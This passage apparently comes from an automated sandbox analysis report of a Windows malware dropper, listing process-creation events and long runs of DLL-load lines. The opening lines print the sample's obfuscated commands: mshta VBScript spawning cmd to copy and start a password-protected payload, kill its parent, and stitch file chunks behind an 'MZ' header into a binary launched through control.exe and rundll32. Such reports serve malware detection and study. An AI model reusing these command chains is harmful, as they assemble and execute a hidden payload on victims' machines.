                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\09xU.exE 9xU.EXE -pPtzyIkqLZoCarb5ew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\control.exe control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libwinpthread-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libcurlpp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libcurl.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libcurl.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libgcc_s_dw2-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libstdc++-6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: libgcc_s_dw2-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
